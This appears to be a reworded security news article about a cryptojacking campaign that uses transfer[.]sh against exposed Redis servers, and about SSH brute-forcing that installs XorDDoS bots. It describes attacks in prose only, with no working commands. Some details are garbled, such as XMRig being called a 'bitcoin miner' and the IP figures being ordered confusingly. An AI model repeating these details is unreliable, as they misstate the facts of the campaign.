A new cryptojacking effort is aimed at misconfigured Redis database servers, and it uses a reliable, open-source command-line file transfer tool to carry out its attack. According to the cloud cybersecurity company, the command line interactivity of transfer[.]sh has made it a perfect tool for hosting and distributing malicious payloads.
“Underpinning this campaign was the use of transfer[.]sh,” Cado Security said in a report. “It’s possible that it’s an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com).”
The attack chain starts by focusing on unsecured Redis deployments, and then it registers a cron job that, when analyzed by the scheduler, results in arbitrary code execution. The job is created to retrieve a payload hosted at transfer[.]sh. It’s important to note that other threat actors like TeamTNT and WatchDog have used similar attack techniques in their cryptojacking activities.
The payload is a script that launches an XMRig bitcoin miner, but not before clearing memory, killing rival miners, and installing the pnscan network scanner tool to discover susceptible Redis servers and spread the infection. Although it is evident that this campaign’s goal is to hijack system resources for cryptocurrency mining, the business warned that infection by this malware might have unforeseen consequences. Data damage or a loss of system availability might very quickly come from the careless configuration of Linux memory management mechanisms.
With this development, Redis servers are now under yet another danger, joining Redigo and HeadCrab in recent months. The discoveries coincide with Avertium’s disclosure of a fresh batch of cyberattacks that include brute-forcing SSH servers in order to install the XorDdos botnet malware on compromised servers and perform distributed denial-of-service (DDoS) attacks against targets in China and the United States.
The cybersecurity firm reported observing 1.2 million illegal SSH connection efforts across 18 honeypots between October 6, and December 7, 2022. It blamed a threat actor headquartered in China for the activities. The remaining came from 8,000 IP addresses dispersed around the globe, while 42% of those attempts came from 49 IP addresses registered to the ChinaNet Jiangsu Province Network.
“It was found that once the scanning identified an open port, it would be subject to a brute-force attack against the ‘root’ account using a list of approximately 17,000 passwords,” said Avertium. “Once the brute-force attack was successful, a XorDDoS bot was installed.”